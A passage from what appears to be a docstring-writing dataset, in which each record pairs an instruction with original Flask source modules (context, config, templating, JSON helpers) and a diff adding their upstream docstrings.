def __contains__(self, item: str) -> bool:
@@ -75,6 +118,24 @@ def after_this_request(
f: ft.AfterRequestCallable[t.Any],
) -> ft.AfterRequestCallable[t.Any]:
+ """Decorate a function to run after the current request. The behavior is the
+ same as :meth:`.Flask.after_request`, except it only applies to the current
+ request, rather than every request. Therefore, it must be used within a
+ request context, rather than during setup.
+
+ .. code-block:: python
+
+ @app.route("/")
+ def index():
+ @after_this_request
+ def add_header(response):
+ response.headers["X-Foo"] = "Parachute"
+ return response
+
+ return "Hello, World!"
+
+ .. versionadded:: 0.9
+ """
ctx = _cv_app.get(None)
if ctx is None or not ctx.has_request:
@@ -91,6 +152,43 @@
def copy_current_request_context(f: F) -> F:
+ """Decorate a function to run inside the current request context. This can
+ be used when starting a background task, otherwise it will not see the app
+ and request objects that were active in the parent.
+
+ .. warning::
+
+ Due to the following caveats, it is often safer (and simpler) to pass
+ the data you need when starting the task, rather than using this and
+ relying on the context objects.
+
+ In order to avoid execution switching partially though reading data, either
+ read the request body (access ``form``, ``json``, ``data``, etc) before
+ starting the task, or use a lock. This can be an issue when using threading,
+ but shouldn't be an issue when using greenlet/gevent or asyncio.
+
+ If the task will access ``session``, be sure to do so in the parent as well
+ so that the ``Vary: cookie`` header will be set. Modifying ``session`` in
+ the task should be avoided, as it may execute after the response cookie has
+ already been written.
+
+ .. code-block:: python
+
+ import gevent
+ from flask import copy_current_request_context
+
+ @app.route('/')
+ def index():
+ @copy_current_request_context
+ def do_some_work():
+ # do some work here, it can access flask.request or
+ # flask.session like you would otherwise in the view function.
+ ...
+ gevent.spawn(do_some_work)
+ return 'Regular response'
+
+ .. versionadded:: 0.10
+ """
ctx = _cv_app.get(None)
if ctx is None:
@@ -109,14 +207,95 @@
def has_request_context() -> bool:
+ """Test if an app context is active and if it has request information.
+
+ .. code-block:: python
+
+ from flask import has_request_context, request
+
+ if has_request_context():
+ remote_addr = request.remote_addr
+
+ If a request context is active, the :data:`.request` and :data:`.session`
+ context proxies will available and ``True``, otherwise ``False``. You can
+ use that to test the data you use, rather than using this function.
+
+ .. code-block:: python
+
+ from flask import request
+
+ if request:
+ remote_addr = request.remote_addr
+
+ .. versionadded:: 0.7
+ """
return (ctx := _cv_app.get(None)) is not None and ctx.has_request
def has_app_context() -> bool:
+ """Test if an app context is active. Unlike :func:`has_request_context`
+ this can be true outside a request, such as in a CLI command.
+
+ .. code-block:: python
+
+ from flask import has_app_context, g
+
+ if has_app_context():
+ g.cached_data = ...
+
+ If an app context is active, the :data:`.g` and :data:`.current_app` context
+ proxies will available and ``True``, otherwise ``False``. You can use that
+ to test the data you use, rather than using this function.
+
+ from flask import g
+
+ if g:
+ g.cached_data = ...
+
+ .. versionadded:: 0.9
+ """
return _cv_app.get(None) is not None
class AppContext:
+ """An app context contains information about an app, and about the request
+ when handling a request. A context is pushed at the beginning of each
+ request and CLI command, and popped at the end. The context is referred to
+ as a "request context" if it has request information, and an "app context"
+ if not.
+
+ Do not use this class directly. Use :meth:`.Flask.app_context` to create an
+ app context if needed during setup, and :meth:`.Flask.test_request_context`
+ to create a request context if needed during tests.
+
+ When the context is popped, it will evaluate all the teardown functions
+ registered with :meth:`~flask.Flask.teardown_request` (if handling a
+ request) then :meth:`.Flask.teardown_appcontext`.
+
+ When using the interactive debugger, the context will be restored so
+ ``request`` is still accessible. Similarly, the test client can preserve the
+ context after the request ends. However, teardown functions may already have
+ closed some resources such as database connections, and will run again when
+ the restored context is popped.
+
+ :param app: The application this context represents.
+ :param request: The request data this context represents.
+ :param session: The session data this context represents. If not given,
+ loaded from the request on first access.
+
+ .. versionchanged:: 3.2
+ Merged with ``RequestContext``. The ``RequestContext`` alias will be
+ removed in Flask 4.0.
+
+ .. versionchanged:: 3.2
+ A combined app and request context is pushed for every request and CLI
+ command, rather than trying to detect if an app context is already
+ pushed.
+
+ .. versionchanged:: 3.2
+ The session is loaded the first time it is accessed, rather than when
+ the context is pushed.
+ """
def __init__(
self,
@@ -159,15 +338,29 @@
@classmethod
def from_environ(cls, app: Flask, environ: WSGIEnvironment, /) -> te.Self:
+ """Create an app context with request data from the given WSGI environ.
+
+ :param app: The application this context represents.
+ :param environ: The request data this context represents.
+ """
request = app.request_class(environ)
request.json_module = app.json
return cls(app, request=request)
@property
def has_request(self) -> bool:
+ """True if this context was created with request data."""
return self._request is not None
def copy(self) -> te.Self:
+ """Create a new context with the same data objects as this context. See
+ :func:`.copy_current_request_context`.
+
+ .. versionchanged:: 1.1
+ The current session data is used instead of reloading the original data.
+
+ .. versionadded:: 0.10
+ """
return self.__class__(
self.app,
request=self._request,
@@ -176,12 +369,17 @@
@property
def request(self) -> Request:
+ """The request object associated with this context. Accessed through
+ :data:`.request`. Only available in request contexts, otherwise raises
+ :exc:`RuntimeError`.
+ """
if self._request is None:
raise RuntimeError("There is no request in this context.")
return self._request
def _get_session(self) -> SessionMixin:
+ """Open the session if it is not already open for this request context."""
if self._request is None:
raise RuntimeError("There is no request in this context.")
@@ -196,11 +394,18 @@
@property
def session(self) -> SessionMixin:
+ """The session object associated with this context. Accessed through
+ :data:`.session`. Only available in request contexts, otherwise raises
+ :exc:`RuntimeError`. Accessing this sets :attr:`.SessionMixin.accessed`.
+ """
session = self._get_session()
session.accessed = True
return session
def match_request(self) -> None:
+ """Apply routing to the current request, storing either the matched
+ endpoint and args, or a routing exception.
+ """
try:
result = self.url_adapter.match(return_rule=True) # type: ignore[union-attr]
except HTTPException as e:
@@ -209,6 +414,17 @@ self._request.url_rule, self._request.view_args = result # type: ignore[union-attr]
def push(self) -> None:
+ """Push this context so that it is the active context. If this is a
+ request context, calls :meth:`match_request` to perform routing with
+ the context active.
+
+ Typically, this is not used directly. Instead, use a ``with`` block
+ to manage the context.
+
+ In some situations, such as streaming or testing, the context may be
+ pushed multiple times. It will only trigger matching and signals if it
+ is not currently pushed.
+ """
self._push_count += 1
if self._cv_token is not None:
@@ -228,6 +444,24 @@ self.match_request()
def pop(self, exc: BaseException | None = None) -> None:
+ """Pop this context so that it is no longer the active context. Then
+ call teardown functions and signals.
+
+ Typically, this is not used directly. Instead, use a ``with`` block
+ to manage the context.
+
+ This context must currently be the active context, otherwise a
+ :exc:`RuntimeError` is raised. In some situations, such as streaming or
+ testing, the context may have been pushed multiple times. It will only
+ trigger cleanup once it has been popped as many times as it was pushed.
+ Until then, it will remain the active context.
+
+ :param exc: An unhandled exception that was raised while the context was
+ active. Passed to teardown functions.
+
+ .. versionchanged:: 0.9
+ Added the ``exc`` argument.
+ """
if self._cv_token is None:
raise RuntimeError(f"Cannot pop this context ({self!r}), it is not pushed.")
@@ -303,4 +537,4 @@ )
return AppContext
- raise AttributeError(name)+ raise AttributeError(name)
| https://raw.githubusercontent.com/pallets/flask/HEAD/src/flask/ctx.py |
Create docstrings for API functions | from __future__ import annotations
import errno
import json
import os
import types
import typing as t
from werkzeug.utils import import_string
if t.TYPE_CHECKING:
import typing_extensions as te
from .sansio.app import App
T = t.TypeVar("T")
class ConfigAttribute(t.Generic[T]):
def __init__(
self, name: str, get_converter: t.Callable[[t.Any], T] | None = None
) -> None:
self.__name__ = name
self.get_converter = get_converter
@t.overload
def __get__(self, obj: None, owner: None) -> te.Self: ...
@t.overload
def __get__(self, obj: App, owner: type[App]) -> T: ...
def __get__(self, obj: App | None, owner: type[App] | None = None) -> T | te.Self:
if obj is None:
return self
rv = obj.config[self.__name__]
if self.get_converter is not None:
rv = self.get_converter(rv)
return rv # type: ignore[no-any-return]
def __set__(self, obj: App, value: t.Any) -> None:
obj.config[self.__name__] = value
class Config(dict): # type: ignore[type-arg]
def __init__(
self,
root_path: str | os.PathLike[str],
defaults: dict[str, t.Any] | None = None,
) -> None:
super().__init__(defaults or {})
self.root_path = root_path
def from_envvar(self, variable_name: str, silent: bool = False) -> bool:
rv = os.environ.get(variable_name)
if not rv:
if silent:
return False
raise RuntimeError(
f"The environment variable {variable_name!r} is not set"
" and as such configuration could not be loaded. Set"
" this variable and make it point to a configuration"
" file"
)
return self.from_pyfile(rv, silent=silent)
def from_prefixed_env(
self, prefix: str = "FLASK", *, loads: t.Callable[[str], t.Any] = json.loads
) -> bool:
prefix = f"{prefix}_"
for key in sorted(os.environ):
if not key.startswith(prefix):
continue
value = os.environ[key]
key = key.removeprefix(prefix)
try:
value = loads(value)
except Exception:
# Keep the value as a string if loading failed.
pass
if "__" not in key:
# A non-nested key, set directly.
self[key] = value
continue
# Traverse nested dictionaries with keys separated by "__".
current = self
*parts, tail = key.split("__")
for part in parts:
# If an intermediate dict does not exist, create it.
if part not in current:
current[part] = {}
current = current[part]
current[tail] = value
return True
def from_pyfile(
self, filename: str | os.PathLike[str], silent: bool = False
) -> bool:
filename = os.path.join(self.root_path, filename)
d = types.ModuleType("config")
d.__file__ = filename
try:
with open(filename, mode="rb") as config_file:
exec(compile(config_file.read(), filename, "exec"), d.__dict__)
except OSError as e:
if silent and e.errno in (errno.ENOENT, errno.EISDIR, errno.ENOTDIR):
return False
e.strerror = f"Unable to load configuration file ({e.strerror})"
raise
self.from_object(d)
return True
def from_object(self, obj: object | str) -> None:
if isinstance(obj, str):
obj = import_string(obj)
for key in dir(obj):
if key.isupper():
self[key] = getattr(obj, key)
def from_file(
self,
filename: str | os.PathLike[str],
load: t.Callable[[t.IO[t.Any]], t.Mapping[str, t.Any]],
silent: bool = False,
text: bool = True,
) -> bool:
filename = os.path.join(self.root_path, filename)
try:
with open(filename, "r" if text else "rb") as f:
obj = load(f)
except OSError as e:
if silent and e.errno in (errno.ENOENT, errno.EISDIR):
return False
e.strerror = f"Unable to load configuration file ({e.strerror})"
raise
return self.from_mapping(obj)
def from_mapping(
self, mapping: t.Mapping[str, t.Any] | None = None, **kwargs: t.Any
) -> bool:
mappings: dict[str, t.Any] = {}
if mapping is not None:
mappings.update(mapping)
mappings.update(kwargs)
for key, value in mappings.items():
if key.isupper():
self[key] = value
return True
def get_namespace(
self, namespace: str, lowercase: bool = True, trim_namespace: bool = True
) -> dict[str, t.Any]:
rv = {}
for k, v in self.items():
if not k.startswith(namespace):
continue
if trim_namespace:
key = k[len(namespace) :]
else:
key = k
if lowercase:
key = key.lower()
rv[key] = v
return rv
def __repr__(self) -> str:
return f"<{type(self).__name__} {dict.__repr__(self)}>" | --- +++ @@ -18,6 +18,7 @@
class ConfigAttribute(t.Generic[T]):
+ """Makes an attribute forward to the config"""
def __init__(
self, name: str, get_converter: t.Callable[[t.Any], T] | None = None
@@ -47,6 +48,48 @@
class Config(dict): # type: ignore[type-arg]
+ """Works exactly like a dict but provides ways to fill it from files
+ or special dictionaries. There are two common patterns to populate the
+ config.
+
+ Either you can fill the config from a config file::
+
+ app.config.from_pyfile('yourconfig.cfg')
+
+ Or alternatively you can define the configuration options in the
+ module that calls :meth:`from_object` or provide an import path to
+ a module that should be loaded. It is also possible to tell it to
+ use the same module and with that provide the configuration values
+ just before the call::
+
+ DEBUG = True
+ SECRET_KEY = 'development key'
+ app.config.from_object(__name__)
+
+ In both cases (loading from any Python file or loading from modules),
+ only uppercase keys are added to the config. This makes it possible to use
+ lowercase values in the config file for temporary values that are not added
+ to the config or to define the config keys in the same file that implements
+ the application.
+
+ Probably the most interesting way to load configurations is from an
+ environment variable pointing to a file::
+
+ app.config.from_envvar('YOURAPPLICATION_SETTINGS')
+
+ In this case before launching the application you have to set this
+ environment variable to the file you want to use. On Linux and OS X
+ use the export statement::
+
+ export YOURAPPLICATION_SETTINGS='/path/to/config/file'
+
+ On windows use `set` instead.
+
+ :param root_path: path to which files are read relative from. When the
+ config object is created by the application, this is
+ the application's :attr:`~flask.Flask.root_path`.
+ :param defaults: an optional dictionary of default values
+ """
def __init__(
self,
@@ -57,6 +100,17 @@ self.root_path = root_path
def from_envvar(self, variable_name: str, silent: bool = False) -> bool:
+ """Loads a configuration from an environment variable pointing to
+ a configuration file. This is basically just a shortcut with nicer
+ error messages for this line of code::
+
+ app.config.from_pyfile(os.environ['YOURAPPLICATION_SETTINGS'])
+
+ :param variable_name: name of the environment variable
+ :param silent: set to ``True`` if you want silent failure for missing
+ files.
+ :return: ``True`` if the file was loaded successfully.
+ """
rv = os.environ.get(variable_name)
if not rv:
if silent:
@@ -72,6 +126,29 @@ def from_prefixed_env(
self, prefix: str = "FLASK", *, loads: t.Callable[[str], t.Any] = json.loads
) -> bool:
+ """Load any environment variables that start with ``FLASK_``,
+ dropping the prefix from the env key for the config key. Values
+ are passed through a loading function to attempt to convert them
+ to more specific types than strings.
+
+ Keys are loaded in :func:`sorted` order.
+
+ The default loading function attempts to parse values as any
+ valid JSON type, including dicts and lists.
+
+ Specific items in nested dicts can be set by separating the
+ keys with double underscores (``__``). If an intermediate key
+ doesn't exist, it will be initialized to an empty dict.
+
+ :param prefix: Load env vars that start with this prefix,
+ separated with an underscore (``_``).
+ :param loads: Pass each string value to this function and use
+ the returned value as the config value. If any error is
+ raised it is ignored and the value remains a string. The
+ default is :func:`json.loads`.
+
+ .. versionadded:: 2.1
+ """
prefix = f"{prefix}_"
for key in sorted(os.environ):
@@ -110,6 +187,20 @@ def from_pyfile(
self, filename: str | os.PathLike[str], silent: bool = False
) -> bool:
+ """Updates the values in the config from a Python file. This function
+ behaves as if the file was imported as module with the
+ :meth:`from_object` function.
+
+ :param filename: the filename of the config. This can either be an
+ absolute filename or a filename relative to the
+ root path.
+ :param silent: set to ``True`` if you want silent failure for missing
+ files.
+ :return: ``True`` if the file was loaded successfully.
+
+ .. versionadded:: 0.7
+ `silent` parameter.
+ """
filename = os.path.join(self.root_path, filename)
d = types.ModuleType("config")
d.__file__ = filename
@@ -125,6 +216,37 @@ return True
def from_object(self, obj: object | str) -> None:
+ """Updates the values from the given object. An object can be of one
+ of the following two types:
+
+ - a string: in this case the object with that name will be imported
+ - an actual object reference: that object is used directly
+
+ Objects are usually either modules or classes. :meth:`from_object`
+ loads only the uppercase attributes of the module/class. A ``dict``
+ object will not work with :meth:`from_object` because the keys of a
+ ``dict`` are not attributes of the ``dict`` class.
+
+ Example of module-based configuration::
+
+ app.config.from_object('yourapplication.default_config')
+ from yourapplication import default_config
+ app.config.from_object(default_config)
+
+ Nothing is done to the object before loading. If the object is a
+ class and has ``@property`` attributes, it needs to be
+ instantiated before being passed to this method.
+
+ You should not use this function to load the actual configuration but
+ rather configuration defaults. The actual config should be loaded
+ with :meth:`from_pyfile` and ideally from a location not within the
+ package because the package might be installed system wide.
+
+ See :ref:`config-dev-prod` for an example of class-based configuration
+ using :meth:`from_object`.
+
+ :param obj: an import name or object
+ """
if isinstance(obj, str):
obj = import_string(obj)
for key in dir(obj):
@@ -138,6 +260,33 @@ silent: bool = False,
text: bool = True,
) -> bool:
+ """Update the values in the config from a file that is loaded
+ using the ``load`` parameter. The loaded data is passed to the
+ :meth:`from_mapping` method.
+
+ .. code-block:: python
+
+ import json
+ app.config.from_file("config.json", load=json.load)
+
+ import tomllib
+ app.config.from_file("config.toml", load=tomllib.load, text=False)
+
+ :param filename: The path to the data file. This can be an
+ absolute path or relative to the config root path.
+ :param load: A callable that takes a file handle and returns a
+ mapping of loaded data from the file.
+ :type load: ``Callable[[Reader], Mapping]`` where ``Reader``
+ implements a ``read`` method.
+ :param silent: Ignore the file if it doesn't exist.
+ :param text: Open the file in text or binary mode.
+ :return: ``True`` if the file was loaded successfully.
+
+ .. versionchanged:: 2.3
+ The ``text`` parameter was added.
+
+ .. versionadded:: 2.0
+ """
filename = os.path.join(self.root_path, filename)
try:
@@ -155,6 +304,13 @@ def from_mapping(
self, mapping: t.Mapping[str, t.Any] | None = None, **kwargs: t.Any
) -> bool:
+ """Updates the config like :meth:`update` ignoring items with
+ non-upper keys.
+
+ :return: Always returns ``True``.
+
+ .. versionadded:: 0.11
+ """
mappings: dict[str, t.Any] = {}
if mapping is not None:
mappings.update(mapping)
@@ -167,6 +323,33 @@ def get_namespace(
self, namespace: str, lowercase: bool = True, trim_namespace: bool = True
) -> dict[str, t.Any]:
+ """Returns a dictionary containing a subset of configuration options
+ that match the specified namespace/prefix. Example usage::
+
+ app.config['IMAGE_STORE_TYPE'] = 'fs'
+ app.config['IMAGE_STORE_PATH'] = '/var/app/images'
+ app.config['IMAGE_STORE_BASE_URL'] = 'http://img.website.com'
+ image_store_config = app.config.get_namespace('IMAGE_STORE_')
+
+ The resulting dictionary `image_store_config` would look like::
+
+ {
+ 'type': 'fs',
+ 'path': '/var/app/images',
+ 'base_url': 'http://img.website.com'
+ }
+
+ This is often useful when configuration options map directly to
+ keyword arguments in functions or class constructors.
+
+ :param namespace: a configuration namespace
+ :param lowercase: a flag indicating if the keys of the resulting
+ dictionary should be lowercase
+ :param trim_namespace: a flag indicating if the keys of the resulting
+ dictionary should not include the namespace
+
+ .. versionadded:: 0.11
+ """
rv = {}
for k, v in self.items():
if not k.startswith(namespace):
@@ -181,4 +364,4 @@ return rv
def __repr__(self) -> str:
- return f"<{type(self).__name__} {dict.__repr__(self)}>"+ return f"<{type(self).__name__} {dict.__repr__(self)}>"
| https://raw.githubusercontent.com/pallets/flask/HEAD/src/flask/config.py |
Write docstrings for data processing functions | from __future__ import annotations
import typing as t
from jinja2 import BaseLoader
from jinja2 import Environment as BaseEnvironment
from jinja2 import Template
from jinja2 import TemplateNotFound
from .ctx import AppContext
from .globals import app_ctx
from .helpers import stream_with_context
from .signals import before_render_template
from .signals import template_rendered
if t.TYPE_CHECKING: # pragma: no cover
from .sansio.app import App
from .sansio.scaffold import Scaffold
def _default_template_ctx_processor() -> dict[str, t.Any]:
ctx = app_ctx._get_current_object()
rv: dict[str, t.Any] = {"g": ctx.g}
if ctx.has_request:
rv["request"] = ctx.request
# The session proxy cannot be replaced, accessing it gets
# RequestContext.session, which sets session.accessed.
return rv
class Environment(BaseEnvironment):
def __init__(self, app: App, **options: t.Any) -> None:
if "loader" not in options:
options["loader"] = app.create_global_jinja_loader()
BaseEnvironment.__init__(self, **options)
self.app = app
class DispatchingJinjaLoader(BaseLoader):
def __init__(self, app: App) -> None:
self.app = app
def get_source(
self, environment: BaseEnvironment, template: str
) -> tuple[str, str | None, t.Callable[[], bool] | None]:
if self.app.config["EXPLAIN_TEMPLATE_LOADING"]:
return self._get_source_explained(environment, template)
return self._get_source_fast(environment, template)
def _get_source_explained(
self, environment: BaseEnvironment, template: str
) -> tuple[str, str | None, t.Callable[[], bool] | None]:
attempts = []
rv: tuple[str, str | None, t.Callable[[], bool] | None] | None
trv: None | (tuple[str, str | None, t.Callable[[], bool] | None]) = None
for srcobj, loader in self._iter_loaders(template):
try:
rv = loader.get_source(environment, template)
if trv is None:
trv = rv
except TemplateNotFound:
rv = None
attempts.append((loader, srcobj, rv))
from .debughelpers import explain_template_loading_attempts
explain_template_loading_attempts(self.app, template, attempts)
if trv is not None:
return trv
raise TemplateNotFound(template)
def _get_source_fast(
self, environment: BaseEnvironment, template: str
) -> tuple[str, str | None, t.Callable[[], bool] | None]:
for _srcobj, loader in self._iter_loaders(template):
try:
return loader.get_source(environment, template)
except TemplateNotFound:
continue
raise TemplateNotFound(template)
def _iter_loaders(self, template: str) -> t.Iterator[tuple[Scaffold, BaseLoader]]:
loader = self.app.jinja_loader
if loader is not None:
yield self.app, loader
for blueprint in self.app.iter_blueprints():
loader = blueprint.jinja_loader
if loader is not None:
yield blueprint, loader
def list_templates(self) -> list[str]:
result = set()
loader = self.app.jinja_loader
if loader is not None:
result.update(loader.list_templates())
for blueprint in self.app.iter_blueprints():
loader = blueprint.jinja_loader
if loader is not None:
for template in loader.list_templates():
result.add(template)
return list(result)
def _render(ctx: AppContext, template: Template, context: dict[str, t.Any]) -> str:
app = ctx.app
app.update_template_context(ctx, context)
before_render_template.send(
app, _async_wrapper=app.ensure_sync, template=template, context=context
)
rv = template.render(context)
template_rendered.send(
app, _async_wrapper=app.ensure_sync, template=template, context=context
)
return rv
def render_template(
template_name_or_list: str | Template | list[str | Template],
**context: t.Any,
) -> str:
ctx = app_ctx._get_current_object()
template = ctx.app.jinja_env.get_or_select_template(template_name_or_list)
return _render(ctx, template, context)
def render_template_string(source: str, **context: t.Any) -> str:
ctx = app_ctx._get_current_object()
template = ctx.app.jinja_env.from_string(source)
return _render(ctx, template, context)
def _stream(
ctx: AppContext, template: Template, context: dict[str, t.Any]
) -> t.Iterator[str]:
app = ctx.app
app.update_template_context(ctx, context)
before_render_template.send(
app, _async_wrapper=app.ensure_sync, template=template, context=context
)
def generate() -> t.Iterator[str]:
yield from template.generate(context)
template_rendered.send(
app, _async_wrapper=app.ensure_sync, template=template, context=context
)
return stream_with_context(generate())
def stream_template(
template_name_or_list: str | Template | list[str | Template],
**context: t.Any,
) -> t.Iterator[str]:
ctx = app_ctx._get_current_object()
template = ctx.app.jinja_env.get_or_select_template(template_name_or_list)
return _stream(ctx, template, context)
def stream_template_string(source: str, **context: t.Any) -> t.Iterator[str]:
ctx = app_ctx._get_current_object()
template = ctx.app.jinja_env.from_string(source)
return _stream(ctx, template, context) | --- +++ @@ -19,6 +19,9 @@
def _default_template_ctx_processor() -> dict[str, t.Any]:
+ """Default template context processor. Replaces the ``request`` and ``g``
+ proxies with their concrete objects for faster access.
+ """
ctx = app_ctx._get_current_object()
rv: dict[str, t.Any] = {"g": ctx.g}
@@ -31,6 +34,10 @@
class Environment(BaseEnvironment):
+ """Works like a regular Jinja environment but has some additional
+ knowledge of how Flask's blueprint works so that it can prepend the
+ name of the blueprint to referenced templates if necessary.
+ """
def __init__(self, app: App, **options: t.Any) -> None:
if "loader" not in options:
@@ -40,6 +47,9 @@
class DispatchingJinjaLoader(BaseLoader):
+ """A loader that looks for templates in the application and all
+ the blueprint folders.
+ """
def __init__(self, app: App) -> None:
self.app = app
@@ -127,12 +137,24 @@ template_name_or_list: str | Template | list[str | Template],
**context: t.Any,
) -> str:
+ """Render a template by name with the given context.
+
+ :param template_name_or_list: The name of the template to render. If
+ a list is given, the first name to exist will be rendered.
+ :param context: The variables to make available in the template.
+ """
ctx = app_ctx._get_current_object()
template = ctx.app.jinja_env.get_or_select_template(template_name_or_list)
return _render(ctx, template, context)
def render_template_string(source: str, **context: t.Any) -> str:
+ """Render a template from the given source string with the given
+ context.
+
+ :param source: The source code of the template to render.
+ :param context: The variables to make available in the template.
+ """
ctx = app_ctx._get_current_object()
template = ctx.app.jinja_env.from_string(source)
return _render(ctx, template, context)
@@ -160,12 +182,31 @@ template_name_or_list: str | Template | list[str | Template],
**context: t.Any,
) -> t.Iterator[str]:
+ """Render a template by name with the given context as a stream.
+ This returns an iterator of strings, which can be used as a
+ streaming response from a view.
+
+ :param template_name_or_list: The name of the template to render. If
+ a list is given, the first name to exist will be rendered.
+ :param context: The variables to make available in the template.
+
+ .. versionadded:: 2.2
+ """
ctx = app_ctx._get_current_object()
template = ctx.app.jinja_env.get_or_select_template(template_name_or_list)
return _stream(ctx, template, context)
def stream_template_string(source: str, **context: t.Any) -> t.Iterator[str]:
+ """Render a template from the given source string with the given
+ context as a stream. This returns an iterator of strings, which can
+ be used as a streaming response from a view.
+
+ :param source: The source code of the template to render.
+ :param context: The variables to make available in the template.
+
+ .. versionadded:: 2.2
+ """
ctx = app_ctx._get_current_object()
template = ctx.app.jinja_env.from_string(source)
- return _stream(ctx, template, context)+ return _stream(ctx, template, context)
| https://raw.githubusercontent.com/pallets/flask/HEAD/src/flask/templating.py |
Add detailed documentation for each class | from __future__ import annotations
import json as _json
import typing as t
from ..globals import current_app
from .provider import _default
if t.TYPE_CHECKING: # pragma: no cover
from ..wrappers import Response
def dumps(obj: t.Any, **kwargs: t.Any) -> str:
if current_app:
return current_app.json.dumps(obj, **kwargs)
kwargs.setdefault("default", _default)
return _json.dumps(obj, **kwargs)
def dump(obj: t.Any, fp: t.IO[str], **kwargs: t.Any) -> None:
if current_app:
current_app.json.dump(obj, fp, **kwargs)
else:
kwargs.setdefault("default", _default)
_json.dump(obj, fp, **kwargs)
def loads(s: str | bytes, **kwargs: t.Any) -> t.Any:
if current_app:
return current_app.json.loads(s, **kwargs)
return _json.loads(s, **kwargs)
def load(fp: t.IO[t.AnyStr], **kwargs: t.Any) -> t.Any:
if current_app:
return current_app.json.load(fp, **kwargs)
return _json.load(fp, **kwargs)
def jsonify(*args: t.Any, **kwargs: t.Any) -> Response:
return current_app.json.response(*args, **kwargs) # type: ignore[return-value] | --- +++ @@ -11,6 +11,32 @@
def dumps(obj: t.Any, **kwargs: t.Any) -> str:
+ """Serialize data as JSON.
+
+ If :data:`~flask.current_app` is available, it will use its
+ :meth:`app.json.dumps() <flask.json.provider.JSONProvider.dumps>`
+ method, otherwise it will use :func:`json.dumps`.
+
+ :param obj: The data to serialize.
+ :param kwargs: Arguments passed to the ``dumps`` implementation.
+
+ .. versionchanged:: 2.3
+ The ``app`` parameter was removed.
+
+ .. versionchanged:: 2.2
+ Calls ``current_app.json.dumps``, allowing an app to override
+ the behavior.
+
+ .. versionchanged:: 2.0.2
+ :class:`decimal.Decimal` is supported by converting to a string.
+
+ .. versionchanged:: 2.0
+ ``encoding`` will be removed in Flask 2.1.
+
+ .. versionchanged:: 1.0.3
+ ``app`` can be passed directly, rather than requiring an app
+ context for configuration.
+ """
if current_app:
return current_app.json.dumps(obj, **kwargs)
@@ -19,6 +45,28 @@
def dump(obj: t.Any, fp: t.IO[str], **kwargs: t.Any) -> None:
+ """Serialize data as JSON and write to a file.
+
+ If :data:`~flask.current_app` is available, it will use its
+ :meth:`app.json.dump() <flask.json.provider.JSONProvider.dump>`
+ method, otherwise it will use :func:`json.dump`.
+
+ :param obj: The data to serialize.
+ :param fp: A file opened for writing text. Should use the UTF-8
+ encoding to be valid JSON.
+ :param kwargs: Arguments passed to the ``dump`` implementation.
+
+ .. versionchanged:: 2.3
+ The ``app`` parameter was removed.
+
+ .. versionchanged:: 2.2
+ Calls ``current_app.json.dump``, allowing an app to override
+ the behavior.
+
+ .. versionchanged:: 2.0
+ Writing to a binary file, and the ``encoding`` argument, will be
+ removed in Flask 2.1.
+ """
if current_app:
current_app.json.dump(obj, fp, **kwargs)
else:
@@ -27,6 +75,30 @@
def loads(s: str | bytes, **kwargs: t.Any) -> t.Any:
+ """Deserialize data as JSON.
+
+ If :data:`~flask.current_app` is available, it will use its
+ :meth:`app.json.loads() <flask.json.provider.JSONProvider.loads>`
+ method, otherwise it will use :func:`json.loads`.
+
+ :param s: Text or UTF-8 bytes.
+ :param kwargs: Arguments passed to the ``loads`` implementation.
+
+ .. versionchanged:: 2.3
+ The ``app`` parameter was removed.
+
+ .. versionchanged:: 2.2
+ Calls ``current_app.json.loads``, allowing an app to override
+ the behavior.
+
+ .. versionchanged:: 2.0
+ ``encoding`` will be removed in Flask 2.1. The data must be a
+ string or UTF-8 bytes.
+
+ .. versionchanged:: 1.0.3
+ ``app`` can be passed directly, rather than requiring an app
+ context for configuration.
+ """
if current_app:
return current_app.json.loads(s, **kwargs)
@@ -34,6 +106,29 @@
def load(fp: t.IO[t.AnyStr], **kwargs: t.Any) -> t.Any:
+ """Deserialize data as JSON read from a file.
+
+ If :data:`~flask.current_app` is available, it will use its
+ :meth:`app.json.load() <flask.json.provider.JSONProvider.load>`
+ method, otherwise it will use :func:`json.load`.
+
+ :param fp: A file opened for reading text or UTF-8 bytes.
+ :param kwargs: Arguments passed to the ``load`` implementation.
+
+ .. versionchanged:: 2.3
+ The ``app`` parameter was removed.
+
+ .. versionchanged:: 2.2
+ Calls ``current_app.json.load``, allowing an app to override
+ the behavior.
+
+ .. versionchanged:: 2.2
+ The ``app`` parameter will be removed in Flask 2.3.
+
+ .. versionchanged:: 2.0
+ ``encoding`` will be removed in Flask 2.1. The file must be text
+ mode, or binary mode with UTF-8 bytes.
+ """
if current_app:
return current_app.json.load(fp, **kwargs)
@@ -41,4 +136,35 @@
def jsonify(*args: t.Any, **kwargs: t.Any) -> Response:
- return current_app.json.response(*args, **kwargs) # type: ignore[return-value]+ """Serialize the given arguments as JSON, and return a
+ :class:`~flask.Response` object with the ``application/json``
+ mimetype. A dict or list returned from a view will be converted to a
+ JSON response automatically without needing to call this.
+
+ This requires an active app context, and calls
+ :meth:`app.json.response() <flask.json.provider.JSONProvider.response>`.
+
+ In debug mode, the output is formatted with indentation to make it
+ easier to read. This may also be controlled by the provider.
+
+ Either positional or keyword arguments can be given, not both.
+ If no arguments are given, ``None`` is serialized.
+
+ :param args: A single value to serialize, or multiple values to
+ treat as a list to serialize.
+ :param kwargs: Treat as a dict to serialize.
+
+ .. versionchanged:: 2.2
+ Calls ``current_app.json.response``, allowing an app to override
+ the behavior.
+
+ .. versionchanged:: 2.0.2
+ :class:`decimal.Decimal` is supported by converting to a string.
+
+ .. versionchanged:: 0.11
+ Added support for serializing top-level arrays. This was a
+ security risk in ancient browsers. See :ref:`security-json`.
+
+ .. versionadded:: 0.2
+ """
+ return current_app.json.response(*args, **kwargs) # type: ignore[return-value]
| https://raw.githubusercontent.com/pallets/flask/HEAD/src/flask/json/__init__.py |
Add docstrings with type hints explained | from __future__ import annotations
import typing as t
from werkzeug.exceptions import BadRequest
from werkzeug.exceptions import HTTPException
from werkzeug.wrappers import Request as RequestBase
from werkzeug.wrappers import Response as ResponseBase
from . import json
from .globals import current_app
from .helpers import _split_blueprint_path
if t.TYPE_CHECKING: # pragma: no cover
from werkzeug.routing import Rule
class Request(RequestBase):
json_module: t.Any = json
#: The internal URL rule that matched the request. This can be
#: useful to inspect which methods are allowed for the URL from
#: a before/after handler (``request.url_rule.methods``) etc.
#: Though if the request's method was invalid for the URL rule,
#: the valid list is available in ``routing_exception.valid_methods``
#: instead (an attribute of the Werkzeug exception
#: :exc:`~werkzeug.exceptions.MethodNotAllowed`)
#: because the request was never internally bound.
#:
#: .. versionadded:: 0.6
url_rule: Rule | None = None
